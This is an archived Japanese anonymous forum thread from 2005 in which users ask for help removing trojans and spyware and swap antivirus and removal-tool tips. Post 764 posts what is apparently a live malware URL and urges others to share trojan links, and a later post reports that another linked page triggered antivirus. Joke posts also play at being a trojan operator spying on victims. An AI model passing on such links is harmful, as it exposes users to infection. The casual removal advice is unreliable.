670 名前:名無しさん@お腹いっぱい。 [05/02/24 04:19:50 ]
WindowsXPです。
ウィルス検索ソフトのANTIDOTEで感染ファイルが見つかりました。
C:\Program Files\Windows Media Player\wmplayer.exe.tmp が、
Trojan-Downloader.Win32.Agent.cm に感染との事です。

対処法を探そうと検索しましたが、シマンテックとトレンドマイクロでは
Trojan-Downloader.Win32.Agent.** と最後の部分が違うのは数種類有るのですが
最後がcmのは登録されてないようで、分かりませんでした。
両社のオンラインスキャンも試しましたが、どちらも結果は感染無しになります。

この場合、単にwmplayer.exe.tmpファイルを削除するだけで良いでしょうか?
一応このファイル名でレジストリを検索してみましたが何も有りませんでした。
又、このファイルの作成日時はWindows Media Playerフォルダの他のファイルと同じ
2002/08/02なので(wmplayer.exe.tmpだけが後に更新されてます。)、
元々あるファイルのようですが、削除したらWMPが起動しなくなってしまうのでしょうか?
(wmplayer.exeファイルは別に有ります。)

671 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/24 04:38:20 ]
>>670
さっさと削除しろ
万が一起動しなくなっても
ダウンロードセンターからダウンロードすればいいだけ



672 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/24 05:23:02 ]
>>670
ANTIDOTEはKasperskyのデータ使ってるからシマンテックやトレンドマイクロよりも信頼性が高い。
それにウイルスに対する命名は各社各様で異なるから名前が違って当り前。
ANTIDOTEで検出したのなら迷わず削除しれ

673 名前:名無しさん@お腹いっぱい。 [05/02/24 18:58:50 ]
>>669
・・・・・なんで??

674 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/24 19:19:10 ]
ANTIDOTE
削除もできたらなぁ(´・ω・`)

675 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/24 19:44:30 ]
削除できねーなら使う意味ねーじゃん


676 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 03:02:25 ]
手動で削除すりゃ良いだけの話

677 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 03:29:03 ]
どうしてこんなにマトモに引っ掛かる馬鹿が多いんだろうか。

678 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 04:09:24 ]
(´・ω・`) 知らんがな

679 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 04:21:53 ]
((´´・・ω・・`))ししららんんががなな

680 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 14:23:00 ]
誰かトロイ対策ソフト(フリー)格付けやってよ

681 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 17:18:36 ]
>>680

アンチウイルス系の定義ファイルをまめに更新する。
↑で対応しきれないトロイは、FW+砂箱で対応するしか他に方法はない。
フリーの砂箱は
 ・SSM: 今はフリーだが、安定動作するようになったらシェアになるとか。
 ・Process Guard: 機能限定でフリー版があるが、どの程度のものか分からない。

SSMは入門レベルの砂箱だが↓のテストトロイは全てブロックできる。
www.firewallleaktester.com/tests.htm



682 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 17:24:09 ]
↑修正

×SSMは入門レベルの砂箱だが↓のテストトロイは全てブロックできる。

○SSMは入門レベルの砂箱だがFWと併用すると↓のテストトロイは全てブロックできる。

683 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 17:36:30 ]
砂箱?

684 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/25 22:06:31 ]
Process GuardのLeakTestの成績をみたいよな。
誰かデータ持ってたらきぼんぬ。

685 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/26 00:47:41 ]
砂箱??

686 名前:670 mailto:sage [05/02/26 01:22:54 ]
>>671>>672
レス遅くなりましたが、ファイル削除しました。
WMPも何事も無く立ち上がりました。
どうもありがとうございます。

687 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/26 01:32:06 ]
ProcessGuardの割れをみつけたがクラックEXEだから使う気にならん。
そんなの使ってレポート書くなよ。信用できないから。

688 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/26 14:32:32 ]
>>685
【sandbox】 砂場、砂箱
保護された領域内でのみプログラムを動作させて安全を確保している。
もし、砂場(保護された領域内)から安全でない領域への動きがあれば
ユーザに許可を求めたり、または遮断することなどが可能。

689 名前:名無しさん@お腹いっぱい。 [05/02/27 14:32:56 ]
トレンドマイクロオンラインスキャンというのをやったらTROJ_〜などが出
てきてしまいました・・・
PC初心者なのでどうしたらいいのやらなんです。
なにか対処方法を教えていただけませんか?

690 名前:名無しさん@お腹いっぱい。 [05/02/27 14:43:02 ]
トロイの木馬系ウィルスにはMcAfeeが一番いいらしい。
漏れも念のためPestpatrol、Ad-Aware、Spybot入れてるが、McAfeeがリアルタイムで弾いてくれる。

691 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/27 15:20:28 ]
>>689
同じ経験あるけど、再起動時に削除する、みたいな感じで普通に削除してくれた。




692 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/27 15:41:55 ]
PC初心者なら全然気にしないでいいですよ

693 名前:名無しさん@お腹いっぱい。 [05/02/27 17:29:22 ]
u-m

694 名前:名無しさん@お腹いっぱい。 [05/02/27 18:04:44 ]
わかりました、McAfeeというのを試してみます。
ありがとうございましたw

695 名前:名無しさん@お腹いっぱい。 [05/02/27 19:25:03 ]
もしもし。どーも。
なんか最近トロイがよくいらっしゃるんだけど。
ノートンで遮断されるからいいけど、何故だ?

696 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/27 20:22:33 ]
初心者ユーザを脅しておけば、次からもノートンを買ってくれるだろうと言う
ノートンのオオカミ少年的営業方針なんだから、
何も心配することはないと言うのが一般的な常識になっている。
分かり易く言えば、トロイに感染していない限りまったく問題ない。

ただ、実際トロイに感染していたら警告はでないだろうからな、困ったもんだ。

697 名前:名無しさん@お腹いっぱい。 mailto:sage [05/02/28 21:41:41 ]
TheCleanerってのは、あんま人気ないのかな。。
www.moosoft.com/
30日間お試し。
2005年2月24日のデータだと、20912のトロイに対応。

698 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/01 02:17:32 ]
>>690
マカフィは便利だよな
たまにエロサイト見てるとトロイの木馬に引っかかるが
自動的に駆除してくれる。

699 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/01 02:58:43 ]
マカフィってフリーでウイルススキャンするのにも
何か登録手続き求められるだろ?登録したら、あとあとウザくない?

700 名前:名無しさん@お腹いっぱい。 [05/03/03 20:46:31 ]
やっぱり困っています・・・。
トロイの木馬の TOROJ_SECONDT.A に感染してどうしようもないのです。
どなたか駆除方法教えてください。

701 名前:i219-167-234-36.s02.a003.ap.plala.or.jp [05/03/03 21:22:14 ]
>>700
日本、』イギリス、アメリカの、どのサイトでも
その「文字列」は、検索不可だった。

新種?  ネタ?



702 名前:名無しさん@お腹いっぱい。 [05/03/04 04:29:55 ]
>>700
よく嫁
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SECONDT.A

703 名前:名無しさん@お腹いっぱい。 [05/03/04 05:56:18 ]
どうやら、TROJ STARTPAG.QA というトロイに感染したらしいです。MJEC.DLLというフォルダがありました。
と、同時にabout.blankというスパイウェアにも感染してしまいました
ウイルスバスターで前者は発見できましたが隔離できませんでした。ぐぐってみても検索結果0件です。

トレンドマイクロのホームページにもまだ情報が載っていません。
どうしたらいいのでしょうか。破壊活動は着々と進んでいるようです。

リカバリするか、トレンドマイクロの対応を待った方がいいのでしょうか

704 名前:名無しさん@お腹いっぱい。 [05/03/04 06:10:50 ]
Win32.Startpage.E

TROJ_STARTPAGE.Q(Trend)

スペル確認してみて。ぐぐったら出てきた。
当方初心者なので力にはなれない。

705 名前:703 [05/03/04 06:42:27 ]
確認してみましたが、確かに TROJ _STARTPAG.QA  でした。

いまみたらかなり破壊活動が進んでました・・・

706 名前:名無しさん@お腹いっぱい。 mailto:age [05/03/04 06:44:43 ]
駆除できそうか?
早く上級者が来ればいいな。

707 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 07:34:39 ]
最近どうでもいいスパイウェアの定義にひっかかる奴が多すぎて
答える気にもならんというのが本音。

708 名前:名無しさん@お腹いっぱい。 [05/03/04 18:08:54 ]
感染ファイルの属性を外して捨てるのみ

わしはいつもそうしているし・・・

709 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 19:56:23 ]
NetBus トロイの木馬のデフォルト遮断 が一致
リモートアドレス (221.154.231.231、4360)


入検知が NetBus トロイの木馬のデフォルト遮断
トロイの木馬を検出して遮断しました。
221.154.231.231 とのすべての通信は

710 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 19:58:53 ]
ノートン入れていて、よくトロイ警告がでるんだけど
ネットに接続してるだけでも、侵入してくるの?

711 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 20:03:34 ]
FWなければ接続してるだけで感染するでしょ



712 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 20:50:25 ]
>>711
接続してるだけで感染?

詳しく!!

713 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/04 21:30:14 ]
口を開けたままだと、虫が入ってくる。

714 名前:703 [05/03/05 09:25:49 ]
>>704,>>706,>>708
ありがとうございます。
これから属性の外し方を勉強してさっそく実行してみます!!

TROJ STARTPAG.QA をウイルスバスターでせっかく隔離できたのに、また復活してました。しかも
TROJ STARTPAG.ET という新種まで産まれてる始末です。

・・・ウイルスバスタじゃもう駄目か


715 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/05 10:22:32 ]
>>714
なんだあ 復活するようになったら、エロ助サイト行き
復活のロジックを勉強して来い

716 名前:名無しさん@お腹いっぱい。 [05/03/06 13:27:15 ]
TROJ_ STARTPAG.QA というトロイにやられました。ウィルスバスターが発見してくれましたが、駆除はできない模様。トレンドマイクロのHP見ても、最新ウィルスのようで、対策法は全て英語かつ素人には難解そうな内容。どうしたらいいのか、どなたか教えて頂けないでしょうか?

717 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/06 16:04:31 ]
ヒロシです…
ノティファイがローカルアドレスだらけだとです…

ヒロシです…
XPに接続できません…

ヒロシです…
Hiroshi-Devil…言ってみただけとです…

ヒロシです…ヒロシです…

718 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/06 17:18:35 ]

              __,,,,,,
─────   ,.-'''"-─ `ー,--─'''''''''''i-、,,           .'  , .. ∧_∧
────  ,.-,/        /::::::::::::::::::::::!,,  \      .∴ '     (>>717
──── (  ,'          i:::::::::::::::::::::;ノ ヽ-、,,/''ー'''"7', ・,‘ r⌒>  _/ /
 ̄ ̄ ̄ ̄  `''|          |:::::::::::::::::::::}     ``ー''".   ’ | y'⌒  ⌒i  ガッ
─────   !       '、:::::::::::::::::::i              |  /  ノ |
_______ '、 `-=''''フ'ー''ヽ、::::::::::/ヽ、-─-、,,-'''ヽ    , ー'  /´ヾ_ノ
─────── \_/     ヽ--く   _,,,..--┴-、 ヽ  / ,  ノ
                        ``"      \>'  / /
                               / / ,'
                             /  /|  |
                            !、_/ /   〉
                                |_/



719 名前:名無しさん@お腹いっぱい。 [05/03/06 21:21:50 ]
>>717
ワラタ

720 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 12:14:40 ]
昨日雑談系2のぞいた瞬間
ノトーン反応したから、また誤爆反応かと思いきや
修復しねぇ消去しねぇときたから、調べてみたら
Backdoor.Nibu.D とかいうやつに感染してたorz
感染場所がギコナビフォルダなので
ギコナビアインスコして、2種スキンしたら
発見されなかったんだけど、大丈夫ってことでO
k?


721 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 12:56:55 ]
ノートンは2ちゃんのログにも反応する



722 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 14:07:30 ]
ログフォルダは除外しろとあれほど

723 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 20:16:41 ]
ワラタ

724 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 20:43:50 ]
ヒロシです…
victimがゲームしかしないとです…

ヒロシです…
メール覗いたらバリバリの左翼だったとです…

ヒロシです…
「やっほぉ♪」って送ったら「あ?殺すぞ?」って返ってきたとです…

ヒロシです…ヒロシです…

725 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 20:58:07 ]


         ∧_∧   
        _( ´_ゝ`)
      /      )           _     _
     / .イ 、  ノ/    ∧ ∧―= ̄ `ヽ. _
    / / |   ( 〈 ∵. ・(   〈__ >  ゛>>724、_―
   | !  ヽ  ー=- ̄ ̄=_、  (/ . ´ノ
   | |   `iー__=―_ ;. / / /   
    !、リ  -=_二__ ̄_=;. / / .'
        /  /       /  /|  |
       /  /       !、_/ /   〉
     / _/             |_/
     ヽ、_ヽ


726 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 21:07:21 ]
>>724
ワラタ

727 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 22:55:15 ]
Trojan. StartPageってのに感染してたよ(;´Д`)
tempの中にあったse.dllってのが感染してたみたい。
about:blank でsearch forというページにスタートアップ時のHPを固定しやがる
とりあえずトロイは脳豚で消したがスパイウェアが消えねぇー

728 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/07 22:58:14 ]
うるせー馬鹿

729 名前:名無しさん@お腹いっぱい。 [05/03/10 02:57:43 ]
Trojan. StartPage.16.Mというのに感染した。
ネットの先頭がSerch forに変えられる。スパイウェアを駆除した後、AVGでトロイも消したが、
ここ三日ほど何度となく感染している。ウィンドウズ起動時に一瞬何かのウィンドウが開きすぐ消えるのだが
このトロイについての詳細キボン。

730 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/10 03:44:28 ]
何よその情報の少なさは
ふざけてるの?

731 名前:名無しさん@お腹いっぱい。 [05/03/10 05:46:50 ]
なんだと



732 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/11 14:53:35 ]
((((;゚Д゚)))ガクガクブルブル

733 名前:教えてください [05/03/12 13:20:31 ]
c\restore\temp\にA000???.CPYというファイルがいくつもあり、PWSteal.Trojanというウイルスに感染しています、とノートンが警告してきました。
ノートンでは対応できず、「システムの復元のチェック」で削除するのですが、再起動するとまたあらわれます。
レジストリに関係あるのかもしれませんが、くわしくはわかりません。
削除する方法をおしえていただけないでしょうか?宜しくお願いします。

734 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/12 13:31:12 ]
>>733
こういうページがすぐに見つかるんだが、ここに書き込む前にたどり着けないか?
www.symantec.com/region/jp/avcenter/venc/data/pwsteal.trojan.html

それらをやってみて分からないところがあったら具体的に書いて初めて誰かに尋ねてみる。
質問があってもみんなスルーされるのはそういう調査手順もなしに助けてとだけ言うからだと思う。

735 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/12 14:45:38 ]
>>729

漏れもタスクバーに何か出るが今は問題なし。
ウイルスなのか?

736 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/12 21:13:31 ]
>>727
WINDOWS\SYSTEMフォルダに lhnngaa.dll がありませんか?
lhnngaa.dllを削除すると、se.dllが復活しなくなった。
lhnngaa.dllが何なのか判らんし、削除して、他に影響があるかどうかはわかりませんが。

737 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/13 09:11:58 ]
>>727
about:blankについてはこちらでチェックしてみるといいですよ。
www.higaitaisaku.com/removeaboutblank.html

738 名前:名無しさん@お腹いっぱい。 [05/03/13 16:24:45 ]
>>727
hijack thisのログを送っていだくとチェックできるかもしれません。
www.higaitaisaku.com/hijackthis.html

739 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/14 02:10:46 ]
ヒロシです…
メール覗いたらサポートに「ナリ対策とか教えて」とか送ってるとです…

ヒロシです…
よくみると五分後に「頼むから返事してよ」とか送ってるとです…

ヒロシです…
厨の溜まり場では一つの罠に十人もひっかかるとです…

ヒロシです…
その十人中十人にMXがインストールされてるとです…

ヒロシです…ヒロシです…

740 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/16 20:45:22 ]
~e5.0001

741 名前:名無しさん@お腹いっぱい。 [05/03/17 16:20:41 ]
trojans spyware include file
[フォルダ名]C:\ProgramFiles\Spybot-Search&Destroy\Includes

ファイル検索で「trojan」で検索したら上記のファイルが2つ出てきました。
削除しないとまずいですか?



742 名前:741 [05/03/17 16:57:53 ]
どなたかお答え願えませんでしょうか。

743 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/17 17:02:33 ]
>>741
ファイル検索って何の検索? 
Spybot? WindowsのExplorer?

744 名前:741 mailto:sage [05/03/17 17:08:59 ]
>743
スタートメニューにある検索です。
他板に貼られていたneverenjoykoreaの掲示板のアドレスを踏んだ後、
スレの流れで「トロイだ」と書かれていました。
ウィルス反応がありませんでした。
おそらく対策をしていないからなのだと思います。

745 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/17 17:13:36 ]
>>744
トロイで自分でtrojanと名乗るファイルもなかろう。Spybotの中のファイルでしょ。
名前で検索しても無意味。対策ソフトでスキャンして判断してくれよ。
対策ソフトはこの板で探してね。


746 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/17 17:15:19 ]
>745
わかりました。
もし感染していない場合でも、このファイル名が出てくる事は有り得るのですか?

747 名前:741=746 mailto:sage [05/03/17 17:16:41 ]
名前欄忘れました。すみません。
>741=746です


748 名前:名無しさん@お腹いっぱい。 [05/03/18 11:47:19 ]
GenericDownloader.n
W32/Sdbot.worm.gen
W32/Sdbot.worm.gen.j
W32/Sdbot.worm.gen.g
QLowZones-3

プレインスコされてたマカフィーのやつでスキャンしたらこいつらが見つかったのですが、駆除しようとしてもエラーになってしまいす。
どのように対処すればよいのでしょうか?

749 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/18 11:58:03 ]
>>748
だめだあ それ
Temporary Internet Files以外から発見されたのなら、
他にもスキャンしても引っかからないものも
きっとインストールされている
リカバリーでもすれば?

750 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/18 12:05:11 ]
>>449
ヘタレの自分には意味が理解できていないのですが、何をしてももうだめって事でしょうか?

とりあえず当てもないのでsymantec security checkしています。


751 名前:750 mailto:sage [05/03/18 12:57:08 ]
77820 個のファイルをスキャンしたところ、 15 ハードディスク上のファイルが感染していました。


メモリ上でウィルスは見つかりませんでした。


C:\WINDOWS\system32\paydial.exe は Backdoor.Tofger に感染しています。
C:\RECYCLER\S-1-5-21-963639892-2690133624-1694720459-1003\Dc1.exe は Dialer.WSV に感染しています。
C:\Program Files\Live2ch\log\tmp4.2ch.net\download\1101842404.dat は VBS.Internal に感染しています。
C:\Program Files\Live2ch\log\sports7.2ch.net\sports\subject.txt は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livetbs\1107746316.dat は Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livetbs\1107747481.dat は Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live8.2ch.net\livecx\1109716837.dat は Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\live16.2ch.net\liventv\1109078839.dat は Unix.Penguin に感染しています。
C:\Program Files\Live2ch\log\game10.2ch.net\gameover\1107134318.dat は Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\sports\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\sports\subject.txt は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\qa\subject.txt は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1110897104.dat は VBS.Freelink.B に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1110978208.dat は VBS.Freelink.B に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1111053680.dat は VBS.Network.E に感染しています。


こんなんでましたけどかなり重症?



752 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/18 13:15:33 ]
>>751
>C:\WINDOWS\system32\paydial.exe は Backdoor.Tofger に感染しています。
>C:\RECYCLER\S-1-5-21-963639892-2690133624-1694720459-1003\Dc1.exe は Dialer.WSV に感染しています。

ログファイルは実行されないからどうでもいいんだけど、
この2つは名前からしてダイヤラーかな
削除するには、セーフモードでスキャンしないときっと無理だろう
ttp://www.bbs.bun-chan.net/srec87.html
参考にでもなるのかな?

753 名前:名無しさん [05/03/20 06:15:32 ]
結構昔のPC使ってんだけど
トロイに感染したら何かへんかあるの?
ちなみに98SE

754 名前:名無しさん@お腹いっぱい。 mailto:sage [05/03/20 09:41:26 ]
気付かないうちにDDos攻撃の部隊に参加してるかもな

755 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/03/21(月) 10:10:53 ]
>>753
犯罪の踏み台にされて、ある日に突然、警察がPCと君を連れて行くかもね?

756 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/03/24(木) 20:35:13 ]
>>753
君はトロイ!

757 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/03/24(木) 23:42:36 ]
>>756
しょうがないから座布団1枚

758 名前:名無しさん@お腹いっぱい。 [2005/03/31(木) 19:36:24 ]
昨日の夜からトロイらしいウイルスと格闘すること20時間・・・ewidoでスキャンすると55個、感染。
ウイルスバスターのFWの除外設定を勝手変えられ、ヤフーのアカウントは乗っ取られ、パスも変えられ。
ヤフー昨日取ったばっかなのにさ('A`)・・・。バスターでなんでウイルス出てこないのか、考える事20時間
MX用にポート開放してたから、そこから侵入→トロイ→('A`)・・・。
もうMXなんかしないと、思わせてくれた長い一日でした。


759 名前:名無しさん@お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 16:32:33 ]
FW入れてねーのか?
プロセスがMXの場合のみ許可ってしてれば良いだけじゃね?

760 名前:名無しさん@お腹いっぱい。 [皇紀2665/04/01(金) 16:37:14 ]
>>623
おまえは何をやっても無駄
だまって死んどけ ムシケラカス

761 名前:名無しさん@お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 21:31:10 ]
>>760
遅ぇよ(笑)



762 名前:名無しさん@お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 22:29:25 ]
>>760
ヒマなヤロ

763 名前:名無しさん@お腹いっぱい。 mailto:sage [皇紀2665/04/01(金) 23:33:42 ]
>>760
三ヶ月前のレスへ
何がそんなに気に障ったのかw

764 名前:名無しさん@お腹いっぱい。 [2005/04/02(土) 04:14:08 ]
つーかみんなが今までに踏んじゃったトロイのアド出そう!
誰がなんと言おうと貼っちゃってね(^_-)-☆
ttp://69.50.161.142/inc/nan7.html

オレはこれ踏んでからなんも対処してないぜb

765 名前:名無しさん@お腹いっぱい。 [2005/04/10(日) 10:51:54 ]
>>764
トロイにはきちんと対処してもらわないと、あなたやあなたの友達だけじゃなく
世の中の人全般が迷惑するんですけど。
(あなたのパソコンが犯罪の踏み台にされるから)

766 名前:名無しさん@お腹いっぱい。 [2005/04/11(月) 00:15:36 ]
>>740
の書き込みは何の意味?

767 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/11(月) 00:36:39 ]
ttp://virus.org.ua/unix/woid.jpg

↑このリンク先にあるトロイに昨日感染しました
どなたか駆除方法を教えていただけませんか?
いちよう自分でewidoというソフトをDLして削除してるのですが
その後少ししてewidoでスキャンするとまた感染ファイルが見つかってキリがないです…
他の板でも質問したのですがいちようこちらでも質問します
XPのceleronを使っています


768 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/11(月) 01:03:55 ]
> このリンク先にあるトロイ
トロイの名称を書けよ。お前のためにわざわざアクセスするととこから
始めないといけないのか

> 他の板でも質問したのですがいちようこちらでも
それを人はマルチポストと呼ぶ

769 名前:名無しさん@お腹いっぱい。 [2005/04/11(月) 10:14:35 ]
私は、ふだんは、ノートンを常駐させています。

昨日初めてa2を使ってみました 3つ検出されました
その次にewidoを使ってみました 何十個も検出されました(ewidoも昨日初めて使いました)

検出力が違うのかなあ。
それとも、駆除する必要のない物まで、ewidoは駆除しているのかなあ

770 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/11(月) 14:33:06 ]
>>767
おいおい、スレ開いたらいきなりバスターが動いたぞw
駆除できたからいいけど、むやみに貼るなよ・・・

771 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/13(水) 00:00:01 ]
今日はじめてトロイに感染したんですが、このままほっといて急に
多額の請求が来ることってありえるんでしょうか・・?



772 名前:名無しさん@お腹いっぱい。 [2005/04/13(水) 11:20:15 ]
>>771
可能性としては、あり得る

一切トロイに感染しなくても、あり得るし。


773 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/13(水) 13:18:07 ]
>>771
可能性論を言うと、クレジットカード番号盗まれて多額の請求が来たり
大学の単位履修のログイン情報盗まれて今年の取得単位が0になったり
踏み台にされて警察にマシン押収されたりするかもしれない

とりあえず感染してると分かったならほっとかない方がいいとは思うよ

774 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/13(水) 18:04:43 ]
>>770
むやみにクリックするなよ。
2チャンだぞここはwww

775 名前:名無しさん@お腹いっぱい。 [2005/04/14(木) 12:24:53 ]
こういうウイルスとかってリストアしてもダメなんでしょうか?

776 名前:名無しさん@お腹いっぱい。 [2005/04/14(木) 15:04:12 ]
>>775
あなたがリストアという言葉をどれだけ正確に使っているかもわからないし、
その質問には答えにくい。

777 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/14(木) 23:55:47 ]
>>775
ウイルスはさっさとリストラしてしまいなさい

778 名前:セキュ初心者 [2005/04/15(金) 19:41:21 ]
スパイウェアの発見&削除ってどうするんですか?
クッキーですか?

779 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/15(金) 19:43:32 ]
>>778
君が何を言っているのか僕にはよく分からないが、とりあえずここはトロイスレだ
www.google.com/search?hl=ja&q=%E3%82%B9%E3%83%91%E3%82%A4%E3%82%A6%E3%82%A7%E3%82%A2+%E7%99%BA%E8%A6%8B+%E5%89%8A%E9%99%A4&lr=lang_ja
このスレはもちろん他のスレにもしばらく書き込まず検索エンジンで色々やってみろ

780 名前:名無しさん@お腹いっぱい。 [2005/04/15(金) 23:49:23 ]
スタートページMがノートンで検出されたが削除できず、
a2では検出さえされない、、、

781 名前:名無しさん@お腹いっぱい。 [2005/04/16(土) 09:32:29 ]
>>780
そういう時は、俺はこれを試してるよ

ewido【Trojan Horsesが気になる貴方に】
pc8.2ch.net/test/read.cgi/sec/1098285373/
スパイウェア削除ソフトSpybot 20
pc8.2ch.net/test/read.cgi/sec/1109267389/
スパイウェア削除ソフトAd-awareSE その20
pc8.2ch.net/test/read.cgi/sec/1111726744/



782 名前:名無しさん@お腹いっぱい。 [2005/04/16(土) 22:09:27 ]
>781

わざわざすいません、、、、さっそく試してみます

783 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 01:01:38 ]
昨日の朝トロイの木馬の一種に感染してしまいました。
 ̄WSteal.Lemir.Hという名前でシマンテックで検索したら、
Legend of Mir 2 オンラインゲームのパスワードを盗み取ろうとするトロイの木馬プログラム
という事が分かったのですがノートンアンチウイルスでは発見は出来て、
削除出来ませんと出て、困っています。
ご存知の方、アドバイスお願い出来ないでしょうか、お願いします。

784 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 02:19:08 ]
www.symantec.co.jp/region/jp/avcenter/venc/data/jp-pwsteal.lemir.h.html
このページを見たんだよな?実際試した訳じゃないから何とも言えないけど
読む限り、この方法通りやれば駆除できると思うけど

785 名前:782 [2005/04/17(日) 03:18:59 ]
>781
ewidoで駆除できました!!マジで助かりました!!


しかしノートンってなんなんだろうか。値段が高くて中途半端で
スキャンも遅くて784のシマンテックの案内どうりにやっても駄目で(しかも
指示語が嘘)



786 名前:783 mailto:sage [2005/04/17(日) 08:22:21 ]
>>784
そのページを見て一通りやってみました。
ただ、削除出来ないファイルがあるんです。
削除出来たファイルも隔離も不能で、
直接フォルダから削除ツール使って完全削除しました。
ウイルスバスターで検索したら他のトロイも見つかりました。
こっちは隔離出来たので良かったです。
他のソフト入れてみてもう少し粘って駆除出来なかったら
再セットアップします。どうもありがとうございました。
ちなみに Legend of Mir というゲームはやった事ないんですよね。

>>785
試しにewido入れてみます。
駆除おめでとうございます。




787 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 10:41:16 ]
JWordの勝手なインストールを止めよう!

www3.ocn.ne.jp/~techu/stop_jword.html

簡単な設定で悪質な自動インストールを防げます
中国人の作ったITテロソフトJWordを排除しよう!


788 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 11:29:02 ]
アンチJWORDがここでも暴れているのか
そもそもそのリンク先は、「自動」インストールを防ぐサイトじゃないし

JWORDにはたしかに困った点がある。
その事を正確に書けばいいのに、「書かない・書けない」アンチJWORDだらけ

789 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 11:48:22 ]
トロイスレに貼るところがいかにも厨。まあこいつにとってはJWordごときが一番の脅威なんだろうけども。

790 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 11:53:04 ]
あまいら頭の弱い人をあんまりいじめるなよ。

791 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 11:57:59 ]
>>789
>>790
も前ら、えらそなこと放いてセキュリティツールは何入れてるんじゃい?



792 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 12:02:16 ]
せくるちー

793 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 12:12:19 ]
>>789
>>790
も前ら、えらそなこと放いてセキュリティツールは何入れてるんじゃい?

794 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 15:01:32 ]
セキュリティは心構えが肝心ですね。ツール使えば安心とかそういう問題じゃないんですよ。

795 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 15:36:49 ]
ウイルスが入っているファイルを知らずに実行した!

